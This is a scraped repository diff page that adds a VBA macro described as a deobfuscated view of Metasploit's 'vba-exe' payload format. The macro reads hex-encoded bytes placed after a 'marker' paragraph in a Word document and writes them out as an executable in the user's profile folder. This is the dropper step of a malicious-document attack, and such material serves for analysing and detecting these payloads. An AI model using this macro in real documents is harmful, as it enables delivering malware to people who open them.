BeyondCy · February 13, 2018 08:00 · Feb 16, 2017 · Feb 13, 2017
diff --git a/officeEmbeddedFileDecode.vba b/officeEmbeddedFileDecode.vba
@@ -1,3 +1,5 @@
+' This is a deobfuscated view of the 'vba-exe' output format of metasploit payload
+'
 ' This macro searches for a marker paragraph, namely "marker" in the example below
 ' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
 ' a local file.

diff --git a/officeEmbeddedFileDecode.vba b/officeEmbeddedFileDecode.vba
@@ -0,0 +1,36 @@
+' This macro searches for a marker paragraph, namely "marker" in the example below
+' and then loads all paragraphs coming next, as a sequence of bytes, then saves it to
+' a local file.
+'
+' Example, in the word document:
+' marker
+' &H4d&H5a&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00 ....
+
+Sub DecodeAndSaveEmbeddedFile()
+    Dim p As Paragraph
+    Dim Text As String
+    Dim MarkerFound As Boolean
+    Dim Counter As Integer
+    Dim FileHandle As Integer
+    Dim b As Byte
+    Dim UserProfile As String
+
+    UserProfile = Environ("USERPROFILE")
+    FileHandle = FreeFile()
+    Open UserProfile + "\whatever.exe" For Binary As FileHandle
+    For Each p In ActiveDocument.Paragraphs
+        DoEvents
+            Text = p.Range.Text
+        If (MarkerFound = True) Then
+            Counter = 1
+            While (Counter < Len(Text))
+                b = Mid(Text, Counter, 4)
+                Put #FileHandle, , b
+                Counter = Counter + 4
+            Wend
+        ElseIf (InStr(1, Text, "marker") > 0 And Len(Text) > 0) Then
+            MarkerFound = True
+        End If
+    Next
+    Close #FileHandle
+End Sub
No results found